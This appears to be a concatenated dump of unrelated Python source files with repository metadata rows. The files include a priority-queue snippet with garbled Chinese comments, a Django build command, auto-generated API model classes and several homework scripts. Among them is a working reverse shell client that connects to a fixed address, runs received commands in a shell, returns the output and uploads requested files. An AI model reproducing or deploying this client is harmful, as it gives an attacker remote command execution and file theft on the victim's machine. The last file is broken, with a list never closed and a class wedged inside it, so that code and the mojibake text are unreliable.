็บง้ๅ็ฑป"""
def __init__(self):
"""ๅๅงๅ๏ผๅฑๆง"""
self._queue = []
self._index = 0
def push(self, item, priority):
"""ไพๆฎ่ดไผๅ
็บงๅฐ็ดขๅผๅ้กนๅๅ
ฅๅ ไธญ"""
heapq.heappush(self._queue, (-priority, self._index, item))
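        # -priority turns Python's min-heap into a max-heap, and the ever-growing
        # index breaks ties in FIFO order so Item objects (which define no
        # ordering) are never compared directly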
self._index += 1
def pop(self):
return heapq.heappop(self._queue)[-1]
class Item():
"""ๆๅ
ฅๅ
็ด """
def __init__(self, name):
self.name = name
def __repr__(self):
return 'Item({!r})'.format(self.name)
# main
q = PriorityQueue()
q.push(Item('neo'), 1)
q.push(Item('jack'), 2)
q.push(Item('sister'), 4)
q.push(Item('me'), 4)
print q.pop()
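# A small demo (added for illustration) of the heapq functions listed in the
# module docstring; printed values assume this exact input list.
import heapq as _hq
_h = [5, 1, 4]
_hq.heapify(_h)                        # _h is now a min-heap
print _hq.heappushpop(_h, 0)           # 0: pushed, then popped as the smallest
print _hq.heapreplace(_h, 9)           # 1: smallest popped first, then 9 pushed
print list(_hq.merge([1, 3], [2, 4]))  # [1, 2, 3, 4]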
| [
"[email protected]"
] | |
1bf7eaa168fb2f7be9f2f08b4db4ea83c94a4ac3 | 772c3a28ee43665420ba53db4df5d96739884918 | /django/trail_threshold_variability/management/commands/buildstatic_ttv.py | 234a08aaf2286807ef5f59b56f35869d19ebb12f | [] | no_license | hmslincs/hmslincs | 4af60b3622750688e9dfd087bcb53daf9caf5c06 | a94a832cc2d9f963c4597eafd6593cd332bfe433 | refs/heads/master | 2021-04-15T05:44:37.226124 | 2020-08-28T16:58:05 | 2020-08-28T16:58:05 | 5,276,090 | 8 | 5 | null | 2020-07-30T18:50:44 | 2012-08-02T18:20:25 | JavaScript | UTF-8 | Python | false | false | 9,895 | py | # -*- coding: utf-8 -*-
import sys
import os
import re
import codecs
import argparse
import itertools
import unipath
import csv
import django.conf
from django.template.loader import render_to_string
from django.core.management.base import BaseCommand, CommandError
from django.contrib.flatpages.models import FlatPage
from django.contrib.sites.models import Site
from optparse import make_option
table = [{'name': u'Modulation of DISC activity (k)',
'schematic_page': 1,
'treatment_map': [('TRAIL', '', 1), ('Mapatumumab', '', 52),
('Apomab', '', 90), ('Mapatumumab', 'anti-Fc', 68),
('Apomab', 'anti-Fc', 103),
('TRAIL', 'FLIP-L overexpression', 124),
('TRAIL', 'FLIP-S overexpression', 131)],
'treatments': [], 'num_columns': 0, 'num_dose_columns': 0,
'num_padding_columns': 0},
         {'name': u'Modulation of activation timing (τ)',
'schematic_page': 3,
'treatment_map': [('TRAIL', 'Bortezomib', 27),
('Mapatumumab', 'Bortezomib', 84),
('Mapatumumab', 'Bortezomib + anti-Fc', 87),
('Apomab', 'Bortezomib', 116),
('Apomab', 'Bortezomib + anti-Fc', 120),
('TRAIL', 'Bortezomib + FLIP-L overexpression', 138),
('TRAIL', 'Bortezomib + FLIP-S overexpression', 141)],
'treatments': [], 'num_columns': 0, 'num_dose_columns': 0,
'num_padding_columns': 0},
         {'name': u'Modulation of the cellular apoptotic threshold (θ)',
'schematic_page': 2,
'treatment_map': [('TRAIL', 'ABT-263', 40),
('TRAIL', 'Bcl-2 overexpression', 144),
('TRAIL', 'ABT-263 + Bcl-2 overexpression', 158),
('TRAIL', 'Bcl-XL overexpression', 149),
('TRAIL', 'ABT-263 + Bcl-XL overexpression', 160)],
'treatments': [], 'num_columns': 0, 'num_dose_columns': 0,
'num_padding_columns': 0}]
data_filenames = ['Aggregate_SingleCell_results.tsv', 'All_SingleCell_data.zip',
'Results_other_lines.zip', 'scripts.zip']
empty_treatment = dict.fromkeys(['name', 'unit', 'doses'])
popup_target_width = 939 * 2
schematic_target_width = 230 * 2
class Command(BaseCommand):
help = 'Builds the static assets and html chunks'
option_list = BaseCommand.option_list + (
make_option('-n', '--no-images', action='store_true', default=False,
help='Skip building images'),
make_option('-d', '--no-data', action='store_true', default=False,
help='Skip building data download files'),
make_option('-r', '--resource-path',
default=('/home/jmuhlich/Dropbox (HMS-LSP)/'
'Roux Hafner TRAIL_DISC_paper/website/'),
help=('Path to resource files (contains "figures" and '
'"data" directories)'))
)
def handle(self, *args, **options):
url = '/explore/trail-threshold-variability/'
content = build_static(options)
page, created = FlatPage.objects.get_or_create(url=url)
page.title = ('Fractional killing arises from cell-to-cell '
'variability in overcoming a caspase activity threshold')
page.content = content
page.template_name = 'trail_threshold_variability/base.html'
page.sites.clear()
page.sites.add(Site.objects.get_current())
page.save()
def build_static(options):
app_path = unipath.Path(__file__).absolute().ancestor(3)
static_path = app_path.child('static', 'trail_threshold_variability')
generated_path = static_path.child('g')
generated_path.mkdir()
resource_path = unipath.Path(options['resource_path'])
img_src_path = resource_path.child('figures')
popup_dest_path = generated_path.child('popup')
schematic_dest_path = generated_path.child('schematic')
data_src_path = resource_path.child('data')
data_dest_path = generated_path.child('data')
treatment_reverse_map = {}
for s_idx, section in enumerate(table):
tmap = section['treatment_map']
treatments = section['treatments'] = [empty_treatment] * len(tmap)
for t_idx, (t_main, t_other, dataset_number) in enumerate(tmap):
treatment_reverse_map[dataset_number] = s_idx, t_idx
dose_img_paths = {}
for p in img_src_path.child('doses').listdir():
match = re.match('(\d{3}).*\.jpg$', p.name)
if match:
dataset_idx = match.group(1).lstrip('0')
# Sanity check: should never see two images for the same dataset.
assert dataset_idx not in dose_img_paths
dose_img_paths[dataset_idx] = p
data_file = open(resource_path.child('datasets_results_internal.tsv'))
groups = itertools.groupby(
csv.reader(data_file, delimiter='\t'),
lambda x: re.match(r'\d', x[0]) is None)
groups = (list(g) for k, g in groups)
for headers, values in itertools.izip(groups, groups):
treatment_row, header_row = headers
s_idx, t_idx = treatment_reverse_map[int(values[0][0])]
values = [dict(zip(header_row, v)) for v in values]
values = [v for v in values if v['Dataset'] in dose_img_paths]
t_main, t_other = table[s_idx]['treatment_map'][t_idx][0:2]
unit = re.search(r'(?<=\()[^)]+', header_row[2]).group()
# FIXME Factor out repeated reference to dose_img_paths[v['Dataset']].
doses = [{'amount': v['Dose'],
'img_filename': dose_img_paths[v['Dataset']].name,
'img_path': dose_img_paths[v['Dataset']],
'id': as_css_identifier(dose_img_paths[v['Dataset']].stem)}
for v in values if v['Dataset'] in dose_img_paths]
table[s_idx]['treatments'][t_idx] = {'name_main': t_main,
'name_other': t_other,
'unit': unit, 'doses': doses}
max_dose_columns = max(len(treatment['doses']) for section in table
for treatment in section['treatments'])
for section in table:
n = max(len(treatment['doses']) for treatment in section['treatments'])
section['num_columns'] = n + 1
section['num_dose_columns'] = n
section['num_padding_columns'] = max_dose_columns - n
doses = [dose for section in table for treatment in section['treatments']
for dose in treatment['doses']]
# Sanity check: make sure there are no colliding dose ids. (Yes this code is
# performance-naive but the list size is trivial.)
dose_ids = [dose['id'] for dose in doses]
assert len(dose_ids) == len(set(dose_ids))
# Assemble data for template and render html.
data = {'table': table }
content = render_to_string('trail_threshold_variability/index.html', data)
if not options['no_images']:
# Resize and copy popup images.
# NOTE: This import is here because wand is broken on orchestra debian
# (binary libMagickWand.so is too old) and won't even import. We can run
# the image generation elsewhere and copy the images in, but the HTML
# generation needs to run here since it writes to the DB. Putting the
# import here allows the -n option to prevent the crash on import.
import wand.image
popup_dest_path.mkdir()
for dose in doses:
dest_path = popup_dest_path.child(dose['img_filename'])
with wand.image.Image(filename=dose['img_path']) as img, \
open(dest_path, 'w') as f:
scale = float(popup_target_width) / img.width
target_size = [int(round(d * scale)) for d in img.size]
img.resize(*target_size, blur=1.5)
img.compression_quality = 20
img.format = 'JPEG'
img.save(file=f)
dest_path.chmod(0o644)
# Extract and copy schematic images.
schematic_dest_path.mkdir()
schematic_path = img_src_path.child('schematics', 'Trajectories_schematics.pdf')
with wand.image.Image(filename=schematic_path, resolution=500) as img:
for section in table:
page_number = section['schematic_page']
page = wand.image.Image(image=img.sequence[page_number])
page.alpha_channel = False
scale = float(schematic_target_width) / page.width
target_size = [int(round(d * scale)) for d in page.size]
page.resize(*target_size)
page.compression_quality = 100
page.format = 'JPEG'
filename = '{}.jpg'.format(page_number)
dest_path = schematic_dest_path.child(filename)
page.save(filename=dest_path)
dest_path.chmod(0o644)
if not options['no_data']:
# Copy data download files.
data_dest_path.mkdir(parents=True)
for filename in data_filenames:
src_path = data_src_path.child(filename)
dest_path = data_dest_path.child(filename)
src_path.copy(dest_path)
dest_path.chmod(0o644)
return content
def as_css_identifier(s):
"""
Sanitize a string for use as a CSS identifier (e.g. a class or id).
Note that we don't remove leading hyphens, nor do we avoid introducing new
ones. If they are a possibility with your data, you should apply a prefix to
the values returned from this function to sidestep the issue entirely.
"""
return re.sub(r'[^a-z0-9-]', '-', s, flags=re.IGNORECASE)
| [
"[email protected]"
] | |
292162c5cafc53d1a12dc03d491b24cf96e78e25 | 1254f553b70353c6d4ee85c2497db23ebb7903f2 | /test/test_component_history_dto.py | 4355b4f43a4156efe6b2297894e9425535b89a0a | [
"Apache-2.0"
] | permissive | tspannhw/nifi-python-swagger-client | 05137bd2ad36706f323621ab2510abb124ce9bf9 | 0cc73d31a1143c3fa73237fd3d4702a7c3c5b3b1 | refs/heads/master | 2021-01-20T02:24:36.484855 | 2017-08-24T12:52:46 | 2017-08-24T12:52:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,377 | py | # coding: utf-8
"""
NiFi Rest Api
The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service.
OpenAPI spec version: 1.2.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import swagger_client
from swagger_client.rest import ApiException
from swagger_client.models.component_history_dto import ComponentHistoryDTO
class TestComponentHistoryDTO(unittest.TestCase):
""" ComponentHistoryDTO unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testComponentHistoryDTO(self):
"""
Test ComponentHistoryDTO
"""
# FIXME: construct object with mandatory attributes with example values
#model = swagger_client.models.component_history_dto.ComponentHistoryDTO()
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
6da0bcecf30603f283acccf783ffabe67f975332 | e3402d37d5a9fb7ee3c3c73e95732d778f48b6fb | /com/kute/algorithms/__init__.py | fda4ab1360693493004b434ada15fd4d10c6bff4 | [] | no_license | kute/purepythontest | 51d3186ddaa2f1142382768380b776a1ba9469ed | 2baa1746a34cefe0be0e5f59be21450d330491a7 | refs/heads/master | 2020-04-12T06:20:14.957566 | 2018-03-18T07:03:22 | 2018-03-18T07:03:22 | 65,204,109 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# __author__ = 'kute'
# __mtime__ = '16/5/24 21:40'
def main():
pass
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
484fb1aa20f41b92a393cd858ddb44178f0c42cf | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2482/60708/267104.py | aad8d1301873e9edbe9c748d5974ac162ce03841 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 610 | py | N=int(input())
for n in range(0,N):
x=int(input())
y=int(input())
result=list(str(x/y))
a=""#ๅฐๆฐ็นๅ
b="."
for i in range(0,len(result)):
if(result[0])=='.':
a=a+result[0]
result.pop(0)
b=''.join(result)[0:]
break
else:
a=a+result[0]
result.pop(0)
if len(b)<16:
print(a,end='')
print(b,end='')
else:
for i in range(1,16+1):
if b[0:i]==b[i:i+i]:
                b='('+b[0:i]+')'
break
print(a,end='')
print(b,end='') | [
"[email protected]"
] | |
742e6ea7de50bcac003bc3d80347733854493805 | bc54edd6c2aec23ccfe36011bae16eacc1598467 | /simscale_sdk/models/one_of_velocity_inlet_bc_net_radiative_heat_flux.py | b26f7a002aaa6f9893e3aa80e77d6c8f7b0d3f5c | [
"MIT"
] | permissive | SimScaleGmbH/simscale-python-sdk | 4d9538d5efcadae718f12504fb2c7051bbe4b712 | 6fe410d676bf53df13c461cb0b3504278490a9bb | refs/heads/master | 2023-08-17T03:30:50.891887 | 2023-08-14T08:09:36 | 2023-08-14T08:09:36 | 331,949,105 | 17 | 5 | null | null | null | null | UTF-8 | Python | false | false | 6,040 | py | # coding: utf-8
"""
SimScale API
The version of the OpenAPI document: 0.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from simscale_sdk.configuration import Configuration
class OneOfVelocityInletBCNetRadiativeHeatFlux(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'type': 'str',
'emissivity': 'DimensionalDimensionless',
'radiative_source_value': 'DimensionalHeatFlux'
}
attribute_map = {
'type': 'type',
'emissivity': 'emissivity',
'radiative_source_value': 'radiativeSourceValue'
}
discriminator_value_class_map = {
'GREYBODY_DIFFUSIVE': 'GreybodyDiffusiveRSBC',
'OPEN_WINDOW': 'OpenWindowRSBC'
}
def __init__(self, type='OPEN_WINDOW', emissivity=None, radiative_source_value=None, local_vars_configuration=None): # noqa: E501
"""OneOfVelocityInletBCNetRadiativeHeatFlux - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._type = None
self._emissivity = None
self._radiative_source_value = None
self.discriminator = 'type'
self.type = type
if emissivity is not None:
self.emissivity = emissivity
if radiative_source_value is not None:
self.radiative_source_value = radiative_source_value
@property
def type(self):
"""Gets the type of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
Schema name: OpenWindowRSBC # noqa: E501
:return: The type of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this OneOfVelocityInletBCNetRadiativeHeatFlux.
Schema name: OpenWindowRSBC # noqa: E501
:param type: The type of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and type is None: # noqa: E501
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
self._type = type
@property
def emissivity(self):
"""Gets the emissivity of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:return: The emissivity of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:rtype: DimensionalDimensionless
"""
return self._emissivity
@emissivity.setter
def emissivity(self, emissivity):
"""Sets the emissivity of this OneOfVelocityInletBCNetRadiativeHeatFlux.
:param emissivity: The emissivity of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:type: DimensionalDimensionless
"""
self._emissivity = emissivity
@property
def radiative_source_value(self):
"""Gets the radiative_source_value of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:return: The radiative_source_value of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:rtype: DimensionalHeatFlux
"""
return self._radiative_source_value
@radiative_source_value.setter
def radiative_source_value(self, radiative_source_value):
"""Sets the radiative_source_value of this OneOfVelocityInletBCNetRadiativeHeatFlux.
:param radiative_source_value: The radiative_source_value of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:type: DimensionalHeatFlux
"""
self._radiative_source_value = radiative_source_value
def get_real_child_model(self, data):
"""Returns the real base class specified by the discriminator"""
discriminator_key = self.attribute_map[self.discriminator]
discriminator_value = data[discriminator_key]
return self.discriminator_value_class_map.get(discriminator_value)
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, OneOfVelocityInletBCNetRadiativeHeatFlux):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, OneOfVelocityInletBCNetRadiativeHeatFlux):
return True
return self.to_dict() != other.to_dict()
| [
"simscale"
] | simscale |
adacebb3ba78137de88beae5fab192ad6c360797 | 571ebcf06cc01309231a97a963f531f8dd90963d | /Hacking Scripts/reverseShellClient.py | 8d0e051c123e16c061dada96f83f7e7f1da281dc | [] | no_license | SV-ZeroOne/Python-Projects | 3da0ec813e2764d5a3cd8f1d9825e698e368a84e | 8820c346e0dde3b4023ce400cb722d08c1b4c52e | refs/heads/master | 2023-08-19T20:43:07.294205 | 2021-10-16T11:57:33 | 2021-10-16T11:57:33 | 95,302,475 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 804 | py | import socket
import subprocess
import os
def transfer(s, path):
if os.path.exists(path):
f = open(path, 'rb')
packet = f.read(1024)
while len(packet) > 0:
s.send(packet)
packet = f.read(1024)
s.send('DONE'.encode())
else:
s.send('File not found'.encode())
def connect():
s = socket.socket()
s.connect(("192.168.100.137",8080))
while True:
command = s.recv(1024)
if 'terminate' in command.decode():
s.close()
break
elif 'grab' in command.decode():
grab, path = command.decode().split("*")
try:
transfer(s, path)
except:
pass
else:
CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send(CMD.stdout.read())
s.send(CMD.stderr.read())
def main():
connect()
main()
| [
"[email protected]"
] | |
5fef595807aff3c1ec3c72433953ec333d323341 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_4/75.py | 8d4a612aa342b0b8858f654fcd10500e495a8f9b | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | import sys
f = open(sys.argv[1])
o = open(sys.argv[1].split('.')[0] + '.out', 'w')
nCases = int(f.readline().strip())
for case in range(nCases):
dimension = int(f.readline())
v1 = map(int, f.readline().strip().split())
v2 = map(int, f.readline().strip().split())
v1.sort()
v2.sort()
v2.reverse()
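    # pairing the smallest entries of v1 with the largest of v2 (ascending vs.
    # descending sort) minimizes the scalar product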
sum = 0
for x,y in zip(v1, v2):
sum += x*y
o.write('Case #%d: %d\n' % (case + 1, sum))
| [
"[email protected]"
] | |
a3f35d160cbff7a6e359c74755f53d3753b84b49 | 99c4d4a6592fded0e8e59652484ab226ac0bd38c | /code/batch-1/dn4/M-105.py | 72c9b3399cabf41ee7dae145d599b123516d8116 | [] | no_license | benquick123/code-profiling | 23e9aa5aecb91753e2f1fecdc3f6d62049a990d5 | 0d496d649247776d121683d10019ec2a7cba574c | refs/heads/master | 2021-10-08T02:53:50.107036 | 2018-12-06T22:56:38 | 2018-12-06T22:56:38 | 126,011,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,446 | py | '''
List of places from the previous exercise. Useful if there are no tests.
kraji = [
    ('Brežice', 68.66, 7.04), ('Lenart', 85.20, 78.75), ('Rateče', -65.04, 70.04),
    ('Ljutomer', 111.26, 71.82), ('Rogaška Slatina', 71.00, 42.00), ('Ribnica', 7.10, -10.50),
    ('Dutovlje', -56.80, -6.93), ('Lokve', -57.94, 19.32), ('Vinica', 43.81, -38.43),
    ('Brtonigla', -71.00, -47.25), ('Kanal', -71.00, 26.25), ('Črnomelj', 39.05, -27.93),
    ('Trbovlje', 29.61, 35.07), ('Beltinci', 114.81, 80.54), ('Domžale', -2.34, 31.50),
    ('Hodoš', 120.70, 105.00), ('Škofja Loka', -23.64, 35.07), ('Velike Lašče', 0.00, 0.00),
    ('Velenje', 33.16, 54.29), ('Šoštanj', 29.61, 57.75), ('Laško', 42.60, 33.29),
    ('Postojna', -29.54, -5.25), ('Ilirska Bistrica', -27.19, -27.93),
    ('Radenci', 100.61, 84.00), ('Črna', 15.41, 66.57), ('Radeče', 39.05, 24.57),
    ('Vitanje', 47.36, 57.75), ('Bled', -37.84, 56.07), ('Tolmin', -63.90, 36.75),
    ('Miren', -72.14, 7.04), ('Ptuj', 87.61, 61.32), ('Gornja Radgona', 97.06, 89.25),
    ('Plave', -73.34, 21.00), ('Novo mesto', 37.91, -3.47), ('Bovec', -76.89, 52.50),
    ('Nova Gorica', -69.79, 12.29), ('Krško', 60.35, 14.07), ('Cerknica', -18.89, -3.47),
    ('Slovenska Bistrica', 66.31, 57.75), ('Anhovo', -72.14, 22.78), ('Ormož', 107.71, 61.32),
    ('Škofije', -59.14, -27.93), ('Čepovan', -60.35, 22.78), ('Murska Sobota', 108.91, 87.57),
    ('Ljubljana', -8.24, 22.78), ('Idrija', -43.74, 17.54), ('Radlje ob Dravi', 41.46, 82.32),
    ('Žalec', 37.91, 43.79), ('Mojstrana', -49.70, 64.79),
    ('Log pod Mangartom', -73.34, 59.54), ('Podkoren', -62.69, 70.04),
    ('Kočevje', 16.61, -21.00), ('Soča', -69.79, 52.50), ('Ajdovščina', -53.25, 5.25),
    ('Bohinjska Bistrica', -48.49, 47.25), ('Tržič', -22.44, 56.07), ('Piran', -75.69, -31.50),
    ('Kranj', -20.09, 43.79), ('Kranjska Gora', -60.35, 68.25), ('Izola', -68.59, -31.50),
    ('Radovljica', -31.95, 54.29), ('Gornji Grad', 13.06, 49.03), ('Šentjur', 54.46, 40.32),
    ('Koper', -63.90, -29.72), ('Celje', 45.01, 42.00), ('Mislinja', 42.60, 66.57),
    ('Metlika', 48.56, -19.21), ('Žaga', -81.65, 49.03), ('Komen', -63.90, -1.68),
    ('Žužemberk', 21.30, 0.00), ('Pesnica', 74.55, 80.54), ('Vrhnika', -23.64, 14.07),
    ('Dravograd', 28.40, 78.75), ('Kamnik', -1.14, 40.32), ('Jesenice', -40.19, 64.79),
    ('Kobarid', -74.55, 43.79), ('Portorož', -73.34, -33.18), ('Muta', 37.91, 82.32),
    ('Sežana', -54.39, -13.96), ('Vipava', -47.29, 1.79), ('Maribor', 72.21, 75.28),
    ('Slovenj Gradec', 31.95, 71.82), ('Litija', 14.20, 22.78), ('Na Logu', -62.69, 57.75),
    ('Stara Fužina', -52.04, 47.25), ('Motovun', -56.80, -52.50), ('Pragersko', 73.41, 57.75),
    ('Most na Soči', -63.90, 33.29), ('Brestanica', 60.35, 15.75),
    ('Savudrija', -80.44, -34.96), ('Sodražica', 0.00, -6.93),
]
'''
from math import sqrt
from random import randint
'''
Warm-up exercises
'''
#1. warm-up
def koordinate(ime, kraji):
    # returns the coordinates of the place we are looking for
for kraj, x, y in kraji:
if kraj == ime:
return x, y
else:
return
#2. warm-up
def razdalja_koordinat(x1, y1, x2, y2):
return sqrt((x2-x1)**2 + (y2-y1)**2)
#3. warm-up
def razdalja(ime1, ime2, kraji):
x1, y1 = koordinate(ime1, kraji)
x2, y2 = koordinate(ime2, kraji)
return razdalja_koordinat(x1, y1, x2, y2)
#print(razdalja("Ljubljana", "Kranj", kraji))
'''
Mandatory exercises
'''
#1. mandatory
def v_dometu(ime, domet, kraji):
container = []
x1, y1 = koordinate(ime, kraji)
for ime_k, x, y in kraji:
if ime_k != ime:
r = razdalja_koordinat(x1, y1, x, y)
if r <= domet:
container.append(ime_k)
return container
#2. mandatory
def najbolj_oddaljeni(ime, imena, kraji):
x1, y1 = koordinate(ime, kraji)
x2, y2 = koordinate(imena[0], kraji)
najvecja_razdalja = razdalja_koordinat(x1, y1, x2, y2)
ime_kraja = imena[0]
for i in imena:
x2, y2 = koordinate(i, kraji)
r = razdalja_koordinat(x1, y1, x2, y2)
if r > najvecja_razdalja:
najvecja_razdalja = r
ime_kraja = i
return ime_kraja
#3. mandatory
def zalijemo(ime, domet, kraji):
return najbolj_oddaljeni(ime, v_dometu(ime, domet, kraji), kraji)
#print(zalijemo("Kranj", 30, kraji))
'''
Bonus exercises
'''
#1. bonus
def presek(s1, s2):
container = []
for i in s1:
if i in s2:
if i not in container:
container.append(i)
return container
def ran(low, high, amount):
container = []
for i in range(0, amount):
container.append(randint(low, high))
return container
s1 = ran(0, 10, 10)
s2 = ran(0, 10, 10)
#print(presek(s1, s2))
#2. bonus
def skupno_zalivanje(ime1, ime2, domet, kraji):
x1, y1 = koordinate(ime1, kraji)
x2, y2 = koordinate(ime2, kraji)
container = []
for ime, x, y in kraji:
r1 = razdalja_koordinat(x1, y1, x, y)
r2 = razdalja_koordinat(x2, y2, x, y)
if r1 < domet and r2 < domet:
container.append(ime)
return container
#print(skupno_zalivanje("Ljubljana", "Bled", 30, kraji))
import unittest
class TestKraji(unittest.TestCase):
vsi_kraji = [
        ('Brežice', 68.66, 7.04),
        ('Lenart', 85.20, 78.75),
        ('Rateče', -65.04, 70.04),
        ('Ljutomer', 111.26, 71.82),
        ('Rogaška Slatina', 71.00, 42.00),
        ('Ribnica', 7.10, -10.50),
        ('Dutovlje', -56.80, -6.93),
        ('Lokve', -57.94, 19.32),
        ('Vinica', 43.81, -38.43),
        ('Brtonigla', -71.00, -47.25),
        ('Kanal', -71.00, 26.25),
        ('Črnomelj', 39.05, -27.93),
        ('Trbovlje', 29.61, 35.07),
        ('Beltinci', 114.81, 80.54),
        ('Domžale', -2.34, 31.50),
        ('Hodoš', 120.70, 105.00),
        ('Škofja Loka', -23.64, 35.07),
        ('Velike Lašče', 0.00, 0.00),
        ('Velenje', 33.16, 54.29),
        ('Šoštanj', 29.61, 57.75),
        ('Laško', 42.60, 33.29),
        ('Postojna', -29.54, -5.25),
        ('Ilirska Bistrica', -27.19, -27.93),
        ('Radenci', 100.61, 84.00),
        ('Črna', 15.41, 66.57),
        ('Radeče', 39.05, 24.57),
        ('Vitanje', 47.36, 57.75),
        ('Bled', -37.84, 56.07),
        ('Tolmin', -63.90, 36.75),
        ('Miren', -72.14, 7.04),
        ('Ptuj', 87.61, 61.32),
        ('Gornja Radgona', 97.06, 89.25),
        ('Plave', -73.34, 21.00),
        ('Novo mesto', 37.91, -3.47),
        ('Bovec', -76.89, 52.50),
        ('Nova Gorica', -69.79, 12.29),
        ('Krško', 60.35, 14.07),
        ('Cerknica', -18.89, -3.47),
        ('Slovenska Bistrica', 66.31, 57.75),
        ('Anhovo', -72.14, 22.78),
        ('Ormož', 107.71, 61.32),
        ('Škofije', -59.14, -27.93),
        ('Čepovan', -60.35, 22.78),
        ('Murska Sobota', 108.91, 87.57),
        ('Ljubljana', -8.24, 22.78),
        ('Idrija', -43.74, 17.54),
        ('Radlje ob Dravi', 41.46, 82.32),
        ('Žalec', 37.91, 43.79),
        ('Mojstrana', -49.70, 64.79),
        ('Log pod Mangartom', -73.34, 59.54),
        ('Podkoren', -62.69, 70.04),
        ('Kočevje', 16.61, -21.00),
        ('Soča', -69.79, 52.50),
        ('Ajdovščina', -53.25, 5.25),
        ('Bohinjska Bistrica', -48.49, 47.25),
        ('Tržič', -22.44, 56.07),
        ('Piran', -75.69, -31.50),
        ('Kranj', -20.09, 43.79),
        ('Kranjska Gora', -60.35, 68.25),
        ('Izola', -68.59, -31.50),
        ('Radovljica', -31.95, 54.29),
        ('Gornji Grad', 13.06, 49.03),
        ('Šentjur', 54.46, 40.32),
        ('Koper', -63.90, -29.72),
        ('Celje', 45.01, 42.00),
        ('Mislinja', 42.60, 66.57),
        ('Metlika', 48.56, -19.21),
        ('Žaga', -81.65, 49.03),
        ('Komen', -63.90, -1.68),
        ('Žužemberk', 21.30, 0.00),
        ('Pesnica', 74.55, 80.54),
        ('Vrhnika', -23.64, 14.07),
        ('Dravograd', 28.40, 78.75),
        ('Kamnik', -1.14, 40.32),
        ('Jesenice', -40.19, 64.79),
        ('Kobarid', -74.55, 43.79),
        ('Portorož', -73.34, -33.18),
        ('Muta', 37.91, 82.32),
        ('Sežana', -54.39, -13.96),
        ('Vipava', -47.29, 1.79),
        ('Maribor', 72.21, 75.28),
        ('Slovenj Gradec', 31.95, 71.82),
        ('Litija', 14.20, 22.78),
        ('Na Logu', -62.69, 57.75),
        ('Stara Fužina', -52.04, 47.25),
        ('Motovun', -56.80, -52.50),
        ('Pragersko', 73.41, 57.75),
        ('Most na Soči', -63.90, 33.29),
        ('Brestanica', 60.35, 15.75),
        ('Savudrija', -80.44, -34.96),
        ('Sodražica', 0.00, -6.93),
class CountCalls:
def __init__(self, f):
self.f = f
self.call_count = 0
def __call__(self, *args, **kwargs):
self.call_count += 1
return self.f(*args, **kwargs)
    @classmethod
    def setUpClass(cls):
        global koordinate, razdalja_koordinat
        try:
            koordinate = cls.CountCalls(koordinate)
        except Exception:
            pass
        try:
            razdalja_koordinat = cls.CountCalls(razdalja_koordinat)
        except Exception:
            pass
def test_1_koordinate(self):
        kraji = [
            ('Brežice', 68.66, 7.04),
            ('Lenart', 85.20, 78.75),
            ('Rateče', -65.04, 70.04),
            ('Ljutomer', 111.26, 71.82)
        ]
